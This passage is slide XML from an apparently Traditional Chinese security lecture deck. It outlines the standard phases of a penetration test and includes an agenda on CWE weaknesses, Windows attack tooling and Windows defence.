              <a:t>情報蒐集階段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文字方塊 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6541292" y="1906264"/>
            <a:ext cx="2519363" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>威脅建模階段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文字方塊 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9708354" y="1850051"/>
            <a:ext cx="2328865" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>漏洞分析階段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文字方塊 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8684939" y="3997737"/>
            <a:ext cx="2326477" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透攻擊階段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文字方塊 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4735114" y="4048451"/>
            <a:ext cx="2717008" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>後滲透攻擊階段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文字方塊 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="4079917"/>
            <a:ext cx="2705098" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>後滲透攻擊階段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文字方塊 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134537" y="1934527"/>
            <a:ext cx="2743200" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>前期互動階段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="＞形箭號 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2935480" y="1828799"/>
            <a:ext cx="341713" cy="8007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2" name="＞形箭號 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6043610" y="1801170"/>
            <a:ext cx="341713" cy="8007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3" name="＞形箭號 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9184481" y="1781180"/>
            <a:ext cx="341713" cy="8007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4" name="＞形箭號 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3973112" y="3900511"/>
            <a:ext cx="341713" cy="8007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5" name="＞形箭號 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7875832" y="3893548"/>
            <a:ext cx="341713" cy="8007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4" name="＞形箭號 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB65C22B-06ED-44E4-9F2D-533FBA675046}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="10701929" y="2827686"/>
            <a:ext cx="341713" cy="8007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1509038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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>前期互動階段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>在前期互動（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Pre-Engagement Interaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>）階段，滲透測試團隊與客戶組織進行互動討論，最重要的是確定滲透測試的範圍、目標、限制條件以及服務合同細節。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>該階段通常涉及收集客戶需求、準備測試計劃、定義測試範圍與邊界、定義業務目標、專案管理與規劃等活動。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906776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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>情報蒐集階段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>在目標範圍確定之後，將進入情報蒐集（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Information Gathering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>）階段，滲透測試團隊可以利用各種資訊來源與蒐集技術方法，嘗試獲取更多關於目標組織網路拓撲、系統配置與安全防禦措施的資訊。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試者可以使用的情報蒐集方法包括公開來源資訊查詢、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Google Hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>、社會工程學、網路踩點、掃描探測、被動監聽、服務查點等。而對目標系統的情報探查能力是滲透測試者一項非常重要的技能，情報蒐集是否充分在很大程度上決定了滲透測試的成敗，因為如果你遺漏關鍵的情報資訊，你將可能在後面的階段裡一無所獲。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1470163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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>威脅建模階段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>在蒐集到充分的情報資訊之後，滲透測試團隊的成員們停下敲擊鍵盤，大家聚到一起針對獲取的資訊進行威脅建模（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Threat Modeling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>）與攻擊規劃。這是滲透測試過程中非常重要，但很容易被忽視的一個關鍵點。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>通過團隊共同的縝密情報分析與攻擊思路頭腦風暴，可以從大量的資訊情報中理清頭緒，確定出最可行的攻擊通道。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1779907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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>漏洞分析階段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>在確定出最可行的攻擊通道之後，接下來需要考慮該如何取得目標系統的訪問控制權，即漏洞分析（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Vulnerability Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>）階段。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>在該階段，滲透測試者需要綜合分析前幾個階段獲取並彙總的情報資訊，特別是安全漏洞掃描結果、服務查點資訊等，通過搜尋可獲取的滲透程式碼資源，找出可以實施滲透攻擊的攻擊點，並在實驗環境中進行驗證。在該階段，高水平的滲透測試團隊還會針對攻擊通道上的一些關鍵系統與服務進行安全漏洞探測與挖掘，期望找出可被利用的未知安全漏洞，並開發出滲透程式碼，從而開啟攻擊通道上的關鍵路徑。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="650220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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>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a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>系統的資安威脅</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2020 CWE Top 25 Most Dangerous Software Weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Windows insecurity 2020</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透測試方法論</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>滲透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" err="1">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" err="1">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Windows defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" err="1">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" err="1">
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>taskkill</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
